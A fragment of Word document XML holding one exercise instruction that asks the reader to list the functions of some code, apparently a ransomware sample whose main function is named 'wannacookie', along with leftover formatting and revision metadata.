    <w:p w14:paraId="2B4370F0" w14:textId="449FD853" w:rsidR="00D80913" w:rsidRDefault="0013432F" w:rsidP="0013432F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> To prepare for the objectives ahead, it will be wise to</w:t>
      </w:r>
      <w:r w:rsidR="008D4F0D">
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> examin</w:t>
      </w:r>
      <w:r w:rsidR="008D4F0D">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the code.  Make a table that lists each function, and the function’s purpose.  The final function, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wannacookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, is </w:t>
      </w:r>
      <w:r w:rsidR="000072C8">
        <w:t>the main function of the program; you can omit that for now.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D80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26801"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA9EF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4E4"/>
    <w:rsid w:val="000072C8"/>
    <w:rsid w:val="0013432F"/>
    <w:rsid w:val="00245343"/>
    <w:rsid w:val="002D242C"/>
    <w:rsid w:val="00396531"/>
    <w:rsid w:val="004A3478"/>
    <w:rsid w:val="006744E4"/>
    <w:rsid w:val="00883E42"/>
    <w:rsid w:val="008D4F0D"/>
    <w:rsid w:val="00946EDC"/>
    <w:rsid w:val="00B50987"/>
    <w:rsid w:val="00B83788"/>
    <w:rsid w:val="00CF5EF8"/>
    <w:rsid w:val="00D80913"/>
    <w:rsid w:val="00F9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60B9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{82081279-821B-414F-880C-E36882F85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44E4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00674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744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744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4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343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wd12XRq2DNk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520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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-07T18:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-13T20:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>